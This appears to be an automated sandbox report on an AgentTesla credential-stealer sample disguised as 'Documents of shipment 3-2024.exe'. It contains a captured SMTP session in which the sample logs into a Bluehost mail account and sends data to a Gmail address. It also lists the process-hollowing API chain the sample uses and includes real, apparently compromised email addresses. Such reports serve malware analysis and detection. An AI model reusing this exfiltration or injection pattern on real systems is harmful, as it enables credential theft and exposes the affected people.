                                            Mar 13, 2024 14:24:40.930562019 CET5874970750.87.139.143192.168.2.10220-box2248.bluehost.com ESMTP Exim 4.96.2 #2 Wed, 13 Mar 2024 07:24:40 -0600
                                            220-We do not authorize the use of this system to transport unsolicited,
                                            220 and/or bulk e-mail.
                                            Mar 13, 2024 14:24:40.931642056 CET49707587192.168.2.1050.87.139.143EHLO 284992
                                            Mar 13, 2024 14:24:41.105228901 CET5874970750.87.139.143192.168.2.10250-box2248.bluehost.com Hello 284992 [191.96.227.194]
                                            250-SIZE 52428800
                                            250-8BITMIME
                                            250-PIPELINING
                                            250-PIPECONNECT
                                            250-AUTH PLAIN LOGIN
                                            250-STARTTLS
                                            250 HELP
                                            Mar 13, 2024 14:24:41.106221914 CET49707587192.168.2.1050.87.139.143AUTH login bW9oYW1tZWQuYWJyYXJAZWxlYy1xYXRhci5jb20=
                                            Mar 13, 2024 14:24:41.280066967 CET5874970750.87.139.143192.168.2.10334 UGFzc3dvcmQ6
                                            Mar 13, 2024 14:24:41.626506090 CET5874970750.87.139.143192.168.2.10235 Authentication succeeded
                                            Mar 13, 2024 14:24:41.626760960 CET49707587192.168.2.1050.87.139.143MAIL FROM:<mohammed.abrar@elec-qatar.com>
                                            Mar 13, 2024 14:24:41.800117016 CET5874970750.87.139.143192.168.2.10250 OK
                                            Mar 13, 2024 14:24:41.800344944 CET49707587192.168.2.1050.87.139.143RCPT TO:<jinhux31@gmail.com>
                                            Mar 13, 2024 14:24:42.023382902 CET5874970750.87.139.143192.168.2.10250 Accepted
                                            Mar 13, 2024 14:24:42.023531914 CET49707587192.168.2.1050.87.139.143DATA
                                            Mar 13, 2024 14:24:42.197254896 CET5874970750.87.139.143192.168.2.10354 Enter message, ending with "." on a line by itself
                                            Mar 13, 2024 14:24:42.198270082 CET49707587192.168.2.1050.87.139.143.
                                            Mar 13, 2024 14:24:42.373305082 CET5874970750.87.139.143192.168.2.10250 OK id=1rkOb4-00464Y-0L
                                            Mar 13, 2024 14:26:20.147953987 CET49707587192.168.2.1050.87.139.143QUIT
                                            Mar 13, 2024 14:26:20.522722960 CET5874970750.87.139.143192.168.2.10221 box2248.bluehost.com closing connection

                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:1
                                            Start time:14:24:36
                                            Start date:13/03/2024
                                            Path:C:\Users\user\Desktop\Documents of shipment 3-2024.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\Documents of shipment 3-2024.exe
                                            Imagebase:0xd0000
                                            File size:731'648 bytes
                                            MD5 hash:779222C4ACE4E7726FC76DEDB4394B77
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1247364304.00000000036AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1247364304.00000000036AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:3
                                            Start time:14:24:37
                                            Start date:13/03/2024
                                            Path:C:\Users\user\Desktop\Documents of shipment 3-2024.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\Documents of shipment 3-2024.exe
                                            Imagebase:0xde0000
                                            File size:731'648 bytes
                                            MD5 hash:779222C4ACE4E7726FC76DEDB4394B77
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2487661512.00000000031F6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2487661512.00000000031EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2484776287.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2484776287.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2487661512.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2487661512.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:false

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:11.9%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:233
                                              Total number of Limit Nodes:9
                                              execution_graph 40716 228f9b8 40717 228f9fe 40716->40717 40720 228fb98 40717->40720 40723 228dd10 40720->40723 40724 228fc00 DuplicateHandle 40723->40724 40725 228faeb 40724->40725 40775 2284668 40776 2284672 40775->40776 40780 2284758 40775->40780 40785 2283e34 40776->40785 40778 228468d 40781 228477d 40780->40781 40789 2284858 40781->40789 40793 2284868 40781->40793 40786 2283e3f 40785->40786 40801 2285c54 40786->40801 40788 2286fd3 40788->40778 40790 228488f 40789->40790 40792 228496c 40790->40792 40797 22844b4 40790->40797 40795 228488f 40793->40795 40794 228496c 40794->40794 40795->40794 40796 22844b4 CreateActCtxA 40795->40796 40796->40794 40798 22858f8 CreateActCtxA 40797->40798 40800 22859bb 40798->40800 40802 2285c5f 40801->40802 40805 22889a0 40802->40805 40804 22897ed 40804->40788 40806 22889ab 40805->40806 40809 22889d0 40806->40809 40808 22898c2 40808->40804 40810 22889db 40809->40810 40811 2288a00 2 API calls 40810->40811 40812 22899c5 40811->40812 40812->40808 40813 67b4aa8 40814 67b4c33 40813->40814 40816 67b4ace 40813->40816 40816->40814 40817 67b0f94 40816->40817 40818 67b4d28 PostMessageW 40817->40818 40820 67b4d94 40818->40820 40820->40816 40825 67b2a0f 40826 67b2a19 40825->40826 40827 67b2c34 40826->40827 40830 67b3320 40826->40830 40848 67b3310 40826->40848 40832 67b333a 40830->40832 40831 67b335e 40831->40827 40866 67b3f9c 40832->40866 40874 67b3b85 40832->40874 40878 67b43c1 40832->40878 40883 67b40e2 40832->40883 40887 67b3ca3 40832->40887 40895 67b3d0e 40832->40895 40903 67b45ef 40832->40903 40907 67b3ba8 40832->40907 40912 67b3ec9 40832->40912 40916 67b3dea 40832->40916 40920 67b3f8a 40832->40920 40925 67b3c2b 40832->40925 40929 67b3b97 40832->40929 40933 67b3c12 40832->40933 40938 67b3e7c 40832->40938 40849 67b3314 40848->40849 40851 67b3f9c 4 API calls 40849->40851 40852 67b3e7c 2 API calls 40849->40852 40853 67b3c12 2 API calls 40849->40853 40854 67b3b97 2 API calls 40849->40854 40855 67b3c2b 2 API calls 40849->40855 40856 67b3f8a 2 API calls 40849->40856 40857 67b3dea 2 API calls 40849->40857 40858 67b3ec9 2 API calls 40849->40858 40859 67b3ba8 2 API calls 40849->40859 40860 67b45ef 2 API calls 40849->40860 40861 67b3d0e 4 API calls 40849->40861 40862 67b3ca3 4 API calls 40849->40862 40863 67b40e2 2 API calls 40849->40863 40864 67b43c1 2 API calls 40849->40864 40865 67b3b85 2 API calls 40849->40865 40850 67b335e 40850->40827 40851->40850 40852->40850 40853->40850 40854->40850 40855->40850 40856->40850 40857->40850 40858->40850 40859->40850 40860->40850 40861->40850 40862->40850 40863->40850 40864->40850 40865->40850 40867 67b3cc1 40866->40867 40869 67b3c12 40866->40869 40943 67b2068 40867->40943 40947 67b2060 40867->40947 40868 67b4020 40868->40831 40869->40868 40951 67b239b 40869->40951 40955 67b23a0 40869->40955 40875 67b3b89 40874->40875 40959 67b2538 40875->40959 40963 67b252c 40875->40963 40879 67b43ca 40878->40879 40967 67b22a8 40879->40967 40971 67b22b0 40879->40971 40880 67b454b 40885 67b22a8 WriteProcessMemory 40883->40885 40886 67b22b0 WriteProcessMemory 40883->40886 40884 67b4110 40885->40884 40886->40884 40888 67b3ca9 40887->40888 40893 67b2068 ResumeThread 40888->40893 40894 67b2060 ResumeThread 40888->40894 40889 67b4020 40889->40831 40890 67b3c12 40890->40889 40891 67b239b ReadProcessMemory 40890->40891 40892 67b23a0 ReadProcessMemory 40890->40892 40891->40890 40892->40890 40893->40890 40894->40890 40896 67b3cc9 40895->40896 40898 67b3c12 40895->40898 40896->40898 40901 67b2068 ResumeThread 40896->40901 40902 67b2060 ResumeThread 40896->40902 40897 67b4020 40897->40831 40898->40897 40899 67b239b ReadProcessMemory 40898->40899 40900 67b23a0 ReadProcessMemory 40898->40900 40899->40898 40900->40898 40901->40898 40902->40898 40904 67b3b89 40903->40904 40904->40903 40905 67b2538 CreateProcessA 40904->40905 40906 67b252c CreateProcessA 40904->40906 40905->40904 40906->40904 40909 67b3b89 40907->40909 40908 67b46ee 40908->40831 40909->40908 40910 67b2538 CreateProcessA 40909->40910 40911 67b252c CreateProcessA 40909->40911 40910->40909 40911->40909 40975 67b2118 40912->40975 40979 67b2113 40912->40979 40913 67b3ee5 40913->40831 40917 67b3df0 40916->40917 40918 67b239b ReadProcessMemory 40917->40918 40919 67b23a0 ReadProcessMemory 40917->40919 40918->40917 40919->40917 40921 67b4365 40920->40921 40983 67b21eb 40921->40983 40987 67b21f0 40921->40987 40922 67b4383 40927 67b2118 Wow64SetThreadContext 40925->40927 40928 67b2113 Wow64SetThreadContext 40925->40928 40926 67b3c45 40926->40831 40927->40926 40928->40926 40930 67b3b89 40929->40930 40931 67b2538 CreateProcessA 40930->40931 40932 67b252c CreateProcessA 40930->40932 40931->40930 40932->40930 40934 67b3c1d 40933->40934 40935 67b435f 40934->40935 40936 67b239b ReadProcessMemory 40934->40936 40937 67b23a0 ReadProcessMemory 40934->40937 40935->40831 40936->40934 40937->40934 40939 67b3e89 40938->40939 40941 67b22a8 WriteProcessMemory 40939->40941 40942 67b22b0 WriteProcessMemory 40939->40942 40940 67b4167 40941->40940 40942->40940 40944 67b20a8 ResumeThread 40943->40944 40946 67b20d9 40944->40946 40946->40869 40948 67b20a8 ResumeThread 40947->40948 40950 67b20d9 40948->40950 40950->40869 40952 67b23eb ReadProcessMemory 40951->40952 40954 67b242f 40952->40954 40954->40869 40956 67b23eb ReadProcessMemory 40955->40956 40958 67b242f 40956->40958 40958->40869 40960 67b253e CreateProcessA 40959->40960 40962 67b2783 40960->40962 40964 67b2530 40963->40964 40964->40964 40965 67b2726 CreateProcessA 40964->40965 40966 67b2783 40965->40966 40968 67b22ac WriteProcessMemory 40967->40968 40970 67b234f 40968->40970 40970->40880 40972 67b22f8 WriteProcessMemory 40971->40972 40974 67b234f 40972->40974 40974->40880 40976 67b215d Wow64SetThreadContext 40975->40976 40978 67b21a5 40976->40978 40978->40913 40980 67b215d Wow64SetThreadContext 40979->40980 40982 67b21a5 40980->40982 40982->40913 40984 67b2230 VirtualAllocEx 40983->40984 40986 67b226d 40984->40986 40986->40922 40988 67b2230 VirtualAllocEx 40987->40988 40990 67b226d 40988->40990 40990->40922 40821 4a56740 40822 4a56753 40821->40822 40823 228a888 2 API calls 40821->40823 40824 2288a00 2 API calls 40821->40824 40823->40822 40824->40822 40991 4a53150 40992 4a53178 40991->40992 40994 4a53229 40991->40994 40997 4a537b0 40992->40997 41002 4a537af 40992->41002 40993 4a531bd 40999 4a537d1 40997->40999 40998 4a537e6 40998->40993 40999->40998 41007 4a52144 40999->41007 41001 4a53851 41003 4a537d1 41002->41003 41004 4a537e6 41003->41004 41005 4a52144 DrawTextExW 41003->41005 41004->40993 41006 4a53851 41005->41006 41009 4a5214f 41007->41009 41008 4a55419 41008->41001 41009->41008 41013 4a55f77 41009->41013 41016 4a55f88 41009->41016 41010 4a5552c 41010->41001 41014 4a55fa5 41013->41014 41019 4a54934 41013->41019 41014->41010 41017 4a54934 DrawTextExW 41016->41017 41018 4a55fa5 41017->41018 41018->41010 41020 4a55fc0 DrawTextExW 41019->41020 41022 4a56066 41020->41022 41022->41014 40726 4a5edb8 FindCloseChangeNotification 40727 4a5ee27 40726->40727 40728 4a57718 40729 4a57737 40728->40729 40731 4a57214 40728->40731 40732 4a5721f 40731->40732 40736 228a888 40732->40736 40740 2288a00 40732->40740 40733 4a577bc 40733->40729 40737 228a8c3 40736->40737 40738 228ab4b 40737->40738 40744 228d1f9 40737->40744 40738->40733 40741 2288a0b 40740->40741 40742 228ab4b 40741->40742 40743 228d1f9 2 API calls 40741->40743 40742->40733 40743->40742 40748 228d230 40744->40748 40751 228d223 40744->40751 40745 228d20e 40745->40738 40755 228d318 40748->40755 40749 228d23f 40749->40745 40752 228d230 40751->40752 40754 228d318 2 API calls 40752->40754 40753 228d23f 40753->40745 40754->40753 40756 228d339 40755->40756 40757 228d35c 40755->40757 40756->40757 40763 228d5c0 40756->40763 40767 228d5b1 40756->40767 40757->40749 40758 228d354 40758->40757 40759 228d560 GetModuleHandleW 40758->40759 40760 228d58d 40759->40760 40760->40749 40764 228d5d4 40763->40764 40765 228d5f9 40764->40765 40771 228c6e8 40764->40771 40765->40758 40769 228d5d4 40767->40769 40768 228d5f9 40768->40758 40769->40768 40770 228c6e8 LoadLibraryExW 40769->40770 40770->40768 40772 228d7a0 LoadLibraryExW 40771->40772 40774 228d819 40772->40774 40774->40765

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 346 8782220-8782248 347 878224a 346->347 348 878224f-8782376 346->348 347->348 357 8782378-8782385 348->357 358 878231e-878239b 348->358 357->358 360 87823a1-8782adf 358->360 361 87828c5-8782907 358->361 365 878290a-878290e 361->365 366 8782472-8782476 365->366 367 8782914-878291a 365->367 368 8782478-8782486 366->368 369 878248b-8782491 366->369 367->361 370 878291c-8782977 367->370 371 878250b-878253d 368->371 372 87824dc-87824e0 369->372 387 8782979-87829ac 370->387 388 87829ae-87829d8 370->388 390 878253f-878254b 371->390 391 8782567 371->391 373 87824e2-87824f9 372->373 374 8782493-878249f 372->374 376 87824fb-87824fe 373->376 377 87824ae-87824b4 373->377 379 87824a1 374->379 380 87824a6-87824ab 374->380 381 8782501-8782505 376->381 383 87824d9 377->383 384 87824b6-87824ba 377->384 379->380 380->377 381->371 385 8782458-878246f 381->385 383->372 389 87824bd-87824ca 384->389 385->366 401 87829e1-8782a60 387->401 388->401 392 878242f-8782453 389->392 393 87824d0-87824d7 389->393 395 878254d-8782553 390->395 396 8782555-878255b 390->396 398 878256d-8782593 391->398 392->381 393->373 400 8782565 395->400 396->400 406 8782596-878259a 398->406 400->398 414 8782a67-8782a7a 401->414 408 87825e9-878261f 406->408 409 878259c-87825d4 406->409 408->389 413 8782625-878269e 408->413 416 8782a89-8782a8e 409->416 428 87826a0 413->428 429 87826a7-87826a8 413->429 414->416 418 8782a90-8782a9e 416->418 419 8782aa5-8782ac4 416->419 418->419 424 8782aca-8782ad1 419->424 425 87823e7-8782b38 419->425 428->429 430 87826ff-8782705 429->430 431 87826aa-87826cc 430->431 432 8782707-87827c9 430->432 433 87826ce 431->433 434 87826d3-87826fc 431->434 443 878280a-878280e 432->443 444 87827cb-8782804 432->444 433->434 434->430 445 878284f-8782853 443->445 446 8782810-8782849 443->446 444->443 447 8782894-8782898 445->447 448 8782855-878288e 445->448 446->445 447->370 451 878289e-87828b6 447->451 448->447 451->406 453 87828bc-87828c3 451->453 453->365
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'q$:$pq$~
                                              • API String ID: 0-4038137657
                                              • Opcode ID: ab6deda3e36390e535bc286348140042e962feaca9c49defb8144eb1dcb6b920
                                              • Instruction ID: c9c09989dfc5b912e3fd6ab159c6dd03597aa3c9255c006c160398f91656aea6
                                              • Opcode Fuzzy Hash: ab6deda3e36390e535bc286348140042e962feaca9c49defb8144eb1dcb6b920
                                              • Instruction Fuzzy Hash: F3420375A40218DFDB25DFA9C884A9DBBB2FF48301F1580E9E509AB226DB31DD91DF10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 516 2287330-2287394 518 228739a-2287507 516->518 519 22878e2-22878fb 516->519 661 2287509-228753f 518->661 662 2287541-2287543 518->662 522 22878fd-2287925 519->522 523 2287976-22879bf 519->523 527 228792b-2287936 522->527 528 2287f55-2287f61 522->528 533 22879cc-22879d4 523->533 534 22879c1-22879c7 523->534 527->528 529 228793c-2287954 527->529 538 2287f9e-2287fa0 528->538 539 2287f63-2287f69 528->539 529->528 532 228795a-2287975 call 22801d8 529->532 540 22879fa 533->540 541 22879d6-22879f8 533->541 537 2287a62-2287aa5 534->537 556 2287b22-2287b9d 537->556 557 2287aa7-2287ad3 537->557 544 2287f6b-2287f75 539->544 545 2287fa6-2287fa9 539->545 546 2287a01-2287a03 540->546 541->546 558 2287f80-2287f87 544->558 549 2287faa-2287fc7 545->549 550 2287fe6-2287fef 545->550 547 2287a09-2287a1f 546->547 548 2287a05-2287a07 546->548 547->537 564 2287a21-2287a24 547->564 548->537 554 2287fc9-2287fd9 549->554 555 2288007-228801f 549->555 570 2287ff6-2287ffd 550->570 554->570 577 2287fdb-2287fe5 554->577 575 228803c-2288040 555->575 576 2288021-2288035 555->576 556->528 574 2287ba3-2287bcc 556->574 557->528 578 2287ad9-2287ae0 557->578 561 2287f89-2287f91 558->561 562 2287fa1-2287fa2 558->562 561->562 569 2287f93-2287f9c 561->569 562->545 573 2287a2a-2287a32 564->573 569->538 579 2287fff-2288006 570->579 580 2288047-2288051 570->580 573->528 581 2287a38-2287a60 573->581 574->528 582 2287bd2-2287bdf 574->582 575->555 583 2288042-2288046 575->583 576->575 577->550 578->528 584 2287ae6-2287af2 578->584 594 228808e-228808f 580->594 595 2288053-2288055 580->595 581->537 581->573 582->528 586 2287be5-2287c01 582->586 584->528 589 2287af8-2287b04 584->589 592 2287c8d-2287cba 586->592 593 2287c07-2287c0d 586->593 589->528 591 2287b0a-2287b1a 589->591 591->556 600 2287cbc-2287cc0 592->600 601 2287d12-2287d24 592->601 597 2287c3c-2287c51 593->597 598 2287c0f-2287c36 593->598 602 2288092-22880a6 594->602 595->602 603 2288057-2288084 595->603 597->528 606 2287c57-2287c73 597->606 598->597 600->601 607 2287cc2 600->607 604 2287d2d-2287d31 601->604 605 2287d26-2287d2b 601->605 617 22880ab-22880b2 602->617 603->617 604->528 611 2287d37-2287d3f 604->611 610 2287d93-2287d9a 605->610 606->528 613 2287c79-2287c87 606->613 608 2287cc7-2287cd5 607->608 608->528 614 2287cdb-2287cf0 608->614 618 2287d9c-2287daa 610->618 619 2287e02-2287e22 610->619 611->528 616 2287d45-2287d52 611->616 613->592 613->593 614->528 621 2287cf6-2287d03 614->621 616->528 622 2287d58-2287d65 616->622 618->619 620 2287dac-2287dc4 618->620 637 2287e25-2287e4e 619->637 630 2287df0-2287e00 call 22801d8 620->630 631 2287dc6 620->631 621->528 624 2287d09-2287d10 621->624 622->528 626 2287d6b-2287d88 622->626 624->601 624->608 626->610 630->637 634 2287dc9-2287dcb 631->634 634->528 640 2287dd1-2287ddf 634->640 638 2287ed8-2287eeb 637->638 639 2287e54-2287ed5 637->639 644 2287f4a-2287f54 638->644 645 2287eed-2287f26 638->645 639->638 640->528 643 2287de5-2287dee 640->643 643->630 643->634 645->644 655 2287f28-2287f44 645->655 655->644 661->662 663 2287549-2287553 662->663 664 2287545-2287547 662->664 665 2287555-228756b 663->665 664->665 667 228756d-228756f 665->667 668 2287571-2287579 665->668 671 228757b-2287580 667->671 668->671 672 2287582-228758d 671->672 673 2287593-22875ba 671->673 672->673 677 22875bc-22875c8 673->677 678 22875ee-22875f8 673->678 677->678 681 22875ca-22875d7 677->681 679 22875fa 678->679 680 2287601-2287689 678->680 679->680 691 22876cb-22876d9 680->691 692 228768b-22876c9 680->692 684 22875d9-22875db 681->684 685 22875dd-22875e8 681->685 684->678 685->678 695 22876e4-2287723 691->695 692->695 712 2287726 call 22883a0 695->712 713 2287726 call 22883b0 695->713 714 2287726 call 2288451 695->714 699 228772c-22877b0 704 22877de-22877fa 699->704 705 22877b2-22877dc 699->705 708 2287808-2287809 704->708 709 22877fc 704->709 705->704 708->519 709->708 712->699 713->699 714->699
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1246487720.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_2280000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRq$LRq$\sq
                                              • API String ID: 0-3677092283
                                              • Opcode ID: 5bc220b70a988f4a5abea2e011bd3f27d396a2d35d7f04870346b13598c196f0
                                              • Instruction ID: 0825682f44780f1e5024e0035276a78a6aed87c8c59e0a21980dd369838fb103
                                              • Opcode Fuzzy Hash: 5bc220b70a988f4a5abea2e011bd3f27d396a2d35d7f04870346b13598c196f0
                                              • Instruction Fuzzy Hash: 6882B075A152198FDB14DFB9C880AADBBF2FF89300F24C569E019EB299DB34D941CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 871 2287326-2287394 873 228739a-2287507 871->873 874 22878e2-22878fb 871->874 1016 2287509-228753f 873->1016 1017 2287541-2287543 873->1017 877 22878fd-2287925 874->877 878 2287976-22879bf 874->878 882 228792b-2287936 877->882 883 2287f55-2287f61 877->883 888 22879cc-22879d4 878->888 889 22879c1-22879c7 878->889 882->883 884 228793c-2287954 882->884 893 2287f9e-2287fa0 883->893 894 2287f63-2287f69 883->894 884->883 887 228795a-2287975 call 22801d8 884->887 895 22879fa 888->895 896 22879d6-22879f8 888->896 892 2287a62-2287aa5 889->892 911 2287b22-2287b9d 892->911 912 2287aa7-2287ad3 892->912 899 2287f6b-2287f75 894->899 900 2287fa6-2287fa9 894->900 901 2287a01-2287a03 895->901 896->901 913 2287f80-2287f87 899->913 904 2287faa-2287fc7 900->904 905 2287fe6-2287fef 900->905 902 2287a09-2287a1f 901->902 903 2287a05-2287a07 901->903 902->892 919 2287a21-2287a24 902->919 903->892 909 2287fc9-2287fd9 904->909 910 2288007-228801f 904->910 925 2287ff6-2287ffd 905->925 909->925 932 2287fdb-2287fe5 909->932 930 228803c-2288040 910->930 931 2288021-2288035 910->931 911->883 929 2287ba3-2287bcc 911->929 912->883 933 2287ad9-2287ae0 912->933 916 2287f89-2287f91 913->916 917 2287fa1-2287fa2 913->917 916->917 924 2287f93-2287f9c 916->924 917->900 928 2287a2a-2287a32 919->928 924->893 934 2287fff-2288006 925->934 935 2288047-2288051 925->935 928->883 936 2287a38-2287a60 928->936 929->883 937 2287bd2-2287bdf 929->937 930->910 938 2288042-2288046 930->938 931->930 932->905 933->883 939 2287ae6-2287af2 933->939 949 228808e-228808f 935->949 950 2288053-2288055 935->950 936->892 936->928 937->883 941 2287be5-2287c01 937->941 939->883 944 2287af8-2287b04 939->944 947 2287c8d-2287cba 941->947 948 2287c07-2287c0d 941->948 944->883 946 2287b0a-2287b1a 944->946 946->911 955 2287cbc-2287cc0 947->955 956 2287d12-2287d24 947->956 952 2287c3c-2287c51 948->952 953 2287c0f-2287c36 948->953 957 2288092-22880a6 949->957 950->957 958 2288057-2288084 950->958 952->883 961 2287c57-2287c73 952->961 953->952 955->956 962 2287cc2 955->962 959 2287d2d-2287d31 956->959 960 2287d26-2287d2b 956->960 972 22880ab-22880b2 957->972 958->972 959->883 966 2287d37-2287d3f 959->966 965 2287d93-2287d9a 960->965 961->883 968 2287c79-2287c87 961->968 963 2287cc7-2287cd5 962->963 963->883 969 2287cdb-2287cf0 963->969 973 2287d9c-2287daa 965->973 974 2287e02-2287e22 965->974 966->883 971 2287d45-2287d52 966->971 968->947 968->948 969->883 976 2287cf6-2287d03 969->976 971->883 977 2287d58-2287d65 971->977 973->974 975 2287dac-2287dc4 973->975 992 2287e25-2287e4e 974->992 985 2287df0-2287e00 call 22801d8 975->985 986 2287dc6 975->986 976->883 979 2287d09-2287d10 976->979 977->883 981 2287d6b-2287d88 977->981 979->956 979->963 981->965 985->992 989 2287dc9-2287dcb 986->989 989->883 995 2287dd1-2287ddf 989->995 993 2287ed8-2287eeb 992->993 994 2287e54-2287ed5 992->994 999 2287f4a-2287f54 993->999 1000 2287eed-2287f26 993->1000 994->993 995->883 998 2287de5-2287dee 995->998 998->985 998->989 1000->999 1010 2287f28-2287f44 1000->1010 1010->999 1016->1017 1018 2287549-2287553 1017->1018 1019 2287545-2287547 1017->1019 1020 2287555-228756b 1018->1020 1019->1020 1022 228756d-228756f 1020->1022 1023 2287571-2287579 1020->1023 1026 228757b-2287580 1022->1026 1023->1026 1027 2287582-228758d 1026->1027 1028 2287593-22875ba 1026->1028 1027->1028 1032 22875bc-22875c8 1028->1032 1033 22875ee-22875f8 1028->1033 1032->1033 1036 22875ca-22875d7 1032->1036 1034 22875fa 1033->1034 1035 2287601-2287689 1033->1035 1034->1035 1046 22876cb-22876d9 1035->1046 1047 228768b-22876c9 1035->1047 1039 22875d9-22875db 1036->1039 1040 22875dd-22875e8 1036->1040 1039->1033 1040->1033 1050 22876e4-2287723 1046->1050 1047->1050 1067 2287726 call 22883a0 1050->1067 1068 2287726 call 22883b0 1050->1068 1069 2287726 call 2288451 1050->1069 1054 228772c-22877b0 1059 22877de-22877fa 1054->1059 1060 22877b2-22877dc 1054->1060 1063 2287808-2287809 1059->1063 1064 22877fc 1059->1064 1060->1059 1063->874 1064->1063 1067->1054 1068->1054 1069->1054
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1246487720.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_2280000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRq$\sq
                                              • API String ID: 0-576302416
                                              • Opcode ID: 540dc822281b87c353cc2790566fcae840f0ef674bb2b382f86ee68fb5e71275
                                              • Instruction ID: 016fa19b32b19e765877ea2a3b36a272628341960d6c9ff5b117933180195484
                                              • Opcode Fuzzy Hash: 540dc822281b87c353cc2790566fcae840f0ef674bb2b382f86ee68fb5e71275
                                              • Instruction Fuzzy Hash: D3D17F75E152168FDB14DF79D884AAEBBF2BFC8300F118529E405EB354DB34AA41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1070 228736a-2287380 1072 228738d-2287394 1070->1072 1073 2287382-228738c 1070->1073 1074 228739a-2287507 1072->1074 1075 22878e2-22878fb 1072->1075 1073->1072 1217 2287509-228753f 1074->1217 1218 2287541-2287543 1074->1218 1078 22878fd-2287925 1075->1078 1079 2287976-22879bf 1075->1079 1083 228792b-2287936 1078->1083 1084 2287f55-2287f61 1078->1084 1089 22879cc-22879d4 1079->1089 1090 22879c1-22879c7 1079->1090 1083->1084 1085 228793c-2287954 1083->1085 1094 2287f9e-2287fa0 1084->1094 1095 2287f63-2287f69 1084->1095 1085->1084 1088 228795a-2287975 call 22801d8 1085->1088 1096 22879fa 1089->1096 1097 22879d6-22879f8 1089->1097 1093 2287a62-2287aa5 1090->1093 1112 2287b22-2287b9d 1093->1112 1113 2287aa7-2287ad3 1093->1113 1100 2287f6b-2287f75 1095->1100 1101 2287fa6-2287fa9 1095->1101 1102 2287a01-2287a03 1096->1102 1097->1102 1114 2287f80-2287f87 1100->1114 1105 2287faa-2287fc7 1101->1105 1106 2287fe6-2287fef 1101->1106 1103 2287a09-2287a1f 1102->1103 1104 2287a05-2287a07 1102->1104 1103->1093 1120 2287a21-2287a24 1103->1120 1104->1093 1110 2287fc9-2287fd9 1105->1110 1111 2288007-228801f 1105->1111 1126 2287ff6-2287ffd 1106->1126 1110->1126 1133 2287fdb-2287fe5 1110->1133 1131 228803c-2288040 1111->1131 1132 2288021-2288035 1111->1132 1112->1084 1130 2287ba3-2287bcc 1112->1130 1113->1084 1134 2287ad9-2287ae0 1113->1134 1117 2287f89-2287f91 1114->1117 1118 2287fa1-2287fa2 1114->1118 1117->1118 1125 2287f93-2287f9c 1117->1125 1118->1101 1129 2287a2a-2287a32 1120->1129 1125->1094 1135 2287fff-2288006 1126->1135 1136 2288047-2288051 1126->1136 1129->1084 1137 2287a38-2287a60 1129->1137 1130->1084 1138 2287bd2-2287bdf 1130->1138 1131->1111 1139 2288042-2288046 1131->1139 1132->1131 1133->1106 1134->1084 1140 2287ae6-2287af2 1134->1140 1150 228808e-228808f 1136->1150 1151 2288053-2288055 1136->1151 1137->1093 1137->1129 1138->1084 1142 2287be5-2287c01 1138->1142 1140->1084 1145 2287af8-2287b04 1140->1145 1148 2287c8d-2287cba 1142->1148 1149 2287c07-2287c0d 1142->1149 1145->1084 1147 2287b0a-2287b1a 1145->1147 1147->1112 1156 2287cbc-2287cc0 1148->1156 1157 2287d12-2287d24 1148->1157 1153 2287c3c-2287c51 1149->1153 1154 2287c0f-2287c36 1149->1154 1158 2288092-22880a6 1150->1158 1151->1158 1159 2288057-2288084 1151->1159 